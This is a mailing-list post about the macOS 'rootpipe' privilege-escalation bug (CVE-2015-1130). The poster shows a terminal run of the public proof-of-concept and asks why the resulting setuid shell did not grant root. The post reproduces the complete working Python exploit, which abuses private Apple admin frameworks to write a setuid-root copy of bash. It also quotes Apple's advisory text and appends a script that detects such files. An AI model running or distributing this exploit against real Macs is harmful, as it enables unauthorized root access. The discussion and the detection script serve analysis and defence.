exploit


Stuart Cracraft

Apr 11, 2015, 1:01:15 AM
to nscodernigh...@googlegroups.com, cocoaheads...@googlegroups.com, Stuart Cracraft
While I agree that setuid 0 is a bad idea, I don’t see the outcome
of running the code and example on an unpatched Mac as giving 
me a shell with a uid of 0, as evidenced by the ownership/mode of
the touched file (abc) being the same as in an unprivileged shell.

Did I miss something?

The run is:

mclure:security smcracraft$ id
uid=1403094701(smcracraft) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),404(com.apple.sharepoint.group.2),33(_appstore),100(_lpoperator),204(_developer),398(com.apple.access_screensharing),399(com.apple.access_ssh),403(com.apple.sharepoint.group.1)
mclure:security smcracraft$ ./cve-2015-1130.py /bin/bash ./rootbash
will write file /Users/smcracraft/src/security/rootbash
Done!
mclure:security smcracraft$ ls -l rootbash
-rwsrwxrwx  1 root  staff  628640 Apr 10 21:52 rootbash
mclure:security smcracraft$ ./rootbash
rootbash-3.2$ id
uid=1403094701(smcracraft) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),404(com.apple.sharepoint.group.2),33(_appstore),100(_lpoperator),204(_developer),398(com.apple.access_screensharing),399(com.apple.access_ssh),403(com.apple.sharepoint.group.1)
rootbash-3.2$ touch /tmp/abc
rootbash-3.2$ ls -l /tmp/abc
-rw-r--r--  1 smcracraft  wheel  0 Apr 10 21:52 /tmp/abc
rootbash-3.2$ exit
exit
mclure:security smcracraft$ ls -l rootbash
-rwsrwxrwx  1 root  staff  628640 Apr 10 21:52 rootbash
mclure:security smcracraft$ grep root /etc/passwd
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_cvmsroot:*:212:212:CVMS Root:/var/empty:/usr/bin/false
mclure:security smcracraft$ 
mclure:security smcracraft$ touch /tmp/def
mclure:security smcracraft$ ls -l /tmp/def
-rw-r--r--  1 smcracraft  wheel  0 Apr 10 21:56 /tmp/def
mclure:security smcracraft$ 

The code is:

#!/usr/bin/python

########################################################
#
#  PoC exploit code for rootpipe (CVE-2015-1130)
#
#  Created by Emil Kvarnhammar, TrueSec
#
#  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
#
#
# python thisscript.py /bin/bash ./rootbash
# ls -l rootbash
# If you see the setuid bit set, then you're compromised.
#
########################################################
import os
import sys
import platform
import re
import ctypes
import objc
from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
from Foundation import NSAutoreleasePool

def load_lib(append_path):
    return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path)

def use_old_api():
    return re.match(r"^(10\.7|10\.8)(\.\d)?$", platform.mac_ver()[0])


args = sys.argv

if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()
    tool = st.tool()
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
else:
    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
    WriteConfigClient = objc.lookUpClass("WriteConfigClient")
    client = WriteConfigClient.sharedClient()
    client.authenticateUsingAuthorizationSync_(None)
    tool = client.remoteProxy()

    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)


print "Done!"

del pool

The announcement:

https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/

The patch:


Specifics:
  • Admin Framework

    Available for: OS X Yosemite v10.10 to v10.10.2

    Impact: A process may gain admin privileges without properly authenticating

    Description: An issue existed when checking XPC entitlements. This issue was addressed with improved entitlement checking.

    CVE-ID

    CVE-2015-1130 : Emil Kvarnhammar at TrueSec
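
The PoC header above says to look at the destination file with ls -l and treat a set setuid bit as a sign of compromise. As an added example (Python 3, not part of the original post or of the PoC), the same check automated over a directory tree; the names classify and scan and the default of scanning the home directory are assumptions made here.

```python
import os
import stat
import sys

def classify(mode, uid):
    """Return the reasons a file looks like the PoC's output; empty list if none."""
    reasons = []
    # Only regular files that are both setuid and owned by root (uid 0) matter here.
    if not stat.S_ISREG(mode) or not (mode & stat.S_ISUID) or uid != 0:
        return reasons
    reasons.append("setuid root")
    # The PoC writes mode 04777, so write bits for others are an extra signal.
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    elif mode & stat.S_IWGRP:
        reasons.append("group-writable")
    return reasons

def scan(root, lstat=os.lstat):
    """Walk root without following symlinks; yield (path, mode string, reasons)."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = lstat(path)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            reasons = classify(st.st_mode, st.st_uid)
            if reasons:
                yield path, stat.filemode(st.st_mode), reasons

if __name__ == "__main__":
    # Assumption: user-writable locations such as the home directory should
    # contain no setuid-root files at all, so every hit deserves a look.
    top = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~")
    for path, mode, reasons in scan(top):
        print(f"{mode} {path}: {', '.join(reasons)}")
```

A file with the ownership and mode shown for rootbash in the run above is reported as setuid root and world-writable.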




